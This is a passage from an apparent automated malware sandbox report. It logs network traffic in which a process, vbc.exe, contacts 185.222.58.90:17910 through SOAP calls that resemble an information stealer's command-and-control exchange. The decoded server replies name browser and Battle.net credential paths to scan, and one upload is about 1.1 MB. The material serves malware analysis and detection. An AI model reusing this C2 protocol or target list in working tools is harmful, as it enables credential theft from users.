                                                        Jun 16, 2022 14:44:33.962264061 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.962372065 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.962627888 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964575052 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964591980 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964605093 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964617968 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964629889 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964643955 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964656115 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964670897 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964684963 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964696884 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964709997 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964804888 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.964996099 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.978255987 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979149103 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979161978 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979172945 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979185104 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979327917 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979551077 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979708910 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.979947090 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.980241060 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.980588913 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.980747938 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.981002092 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.981249094 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983613968 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983654022 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983680964 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983707905 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983736038 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983762026 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983788013 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983815908 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.983840942 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984188080 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984219074 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984246016 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984272003 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984375000 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984453917 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984509945 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984857082 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.984973907 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.985574961 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:34.003176928 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:34.024102926 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:34.024156094 CEST4991517910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:38.524028063 CEST4991817910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:38.546561003 CEST1791049918185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:38.547801971 CEST4991817910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:38.557275057 CEST4991817910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:38.580869913 CEST1791049918185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:38.581162930 CEST4991817910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:38.605325937 CEST1791049918185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:38.687170982 CEST4991817910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:43.686079979 CEST4991817910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:43.709475040 CEST1791049918185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:43.712213039 CEST4991817910192.168.2.5185.222.58.90

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 16, 2022 14:43:15.274486065 CEST5039353192.168.2.58.8.8.8
                                                        Jun 16, 2022 14:43:15.307981014 CEST5485053192.168.2.58.8.8.8
                                                        Jun 16, 2022 14:44:13.569449902 CEST5207853192.168.2.58.8.8.8
                                                        Jun 16, 2022 14:44:13.610606909 CEST5375953192.168.2.58.8.8.8

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jun 16, 2022 14:43:15.274486065 CEST192.168.2.58.8.8.80x9062Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                        Jun 16, 2022 14:43:15.307981014 CEST192.168.2.58.8.8.80xc293Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                        Jun 16, 2022 14:44:13.569449902 CEST192.168.2.58.8.8.80x855bStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                        Jun 16, 2022 14:44:13.610606909 CEST192.168.2.58.8.8.80x58dStandard query (0)api.ip.sbA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jun 16, 2022 14:43:15.296925068 CEST8.8.8.8192.168.2.50x9062No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                        Jun 16, 2022 14:43:15.330672979 CEST8.8.8.8192.168.2.50xc293No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                        Jun 16, 2022 14:44:13.592020988 CEST8.8.8.8192.168.2.50x855bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                        Jun 16, 2022 14:44:13.632795095 CEST8.8.8.8192.168.2.50x58dNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • 185.222.58.90:17910

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.549780185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:43:07.412843943 CEST1261OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:43:07.436301947 CEST1262INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:43:07.461302042 CEST1265INHTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:07 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:43:14.662225962 CEST1939OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:43:14.686064959 CEST1939INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:43:14.732625008 CEST1950INHTTP/1.1 200 OK
                                                        Content-Length: 4744
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:14 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.549849185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:43:34.228127003 CEST2469OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105566
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:43:34.252454042 CEST2470INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:43:35.144640923 CEST3633INHTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:34 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:43:35.148380995 CEST3634OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105558
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:43:35.171581984 CEST3634INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:43:35.475014925 CEST5252INHTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:34 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.549859185.222.58.9017910C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jun 16, 2022 14:44:00.032973051 CEST12877OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:00.056508064 CEST12877INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:00.081240892 CEST12878INHTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:59 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:44:12.046207905 CEST12928OUTPOST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:12.070036888 CEST12928INHTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:12.117949963 CEST12929INHTTP/1.1 200 OK
                                                        Content-Length: 4744
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:12 GMT
                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 